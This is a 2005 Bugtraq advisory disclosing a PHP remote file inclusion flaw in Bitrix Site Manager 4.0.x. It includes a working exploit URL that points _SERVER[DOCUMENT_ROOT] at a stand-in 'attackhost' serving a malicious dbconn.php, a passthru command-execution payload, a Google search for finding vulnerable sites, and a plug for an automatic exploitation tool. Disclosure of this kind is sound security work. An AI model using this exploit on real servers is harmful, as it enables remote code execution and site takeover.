Vulnerability: Bitrix Php inclusion

To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Vulnerability: Bitrix Php inclusion
From: D_BuG <d_bug@xxxxx>
Date: Wed, 15 Jun 2005 17:58:11 +0400
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: D_BuG <d_bug@xxxxx>

Vendor: Bitrix
Product: Bitrix Site Manager 4.0.x

Vulnerability: php including.
Consequence: custom php code execution on server
Risk: Critical

Description:
Due to unfiltered _SERVER[DOCUMENT_ROOT] variable in file 
“\bitrix\modules\main\start.php”,
hacker can upload php script from other server and execute custom php code on 
webserver
Send transaction to the server.

Script Example:
<?php
passthru('ls -la');
?>

Transaction should look like 
http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/
“attackhost” server should contain dbconn.php script in /bitrix/php_interface/ ,
that should be executet on the target server.

Google search: inurl: /bitrix/

Discoveried By D_BuG d_bug@xxxxx
NemesisSecurityTeam
http://nemesisoftware.com/

CheckZond free v. 1.0 http://nemesisoftware.com/products.htm
uses the vulnerabilities above for automatic vulnerabilities search (Google 
Hacking technique) and usage.

-- 
Best regards,
 D_BuG                          mailto:d_bug@xxxxx

Prev by Date: Vulnerability: McGallery v 1.1 Mysql DB including
Next by Date: Vulnerability: Bitrix Web Server Paths
Previous by thread: Vulnerability: McGallery v 1.1 Mysql DB including
Next by thread: Vulnerability: Bitrix Web Server Paths
Index(es):
- Date
- Thread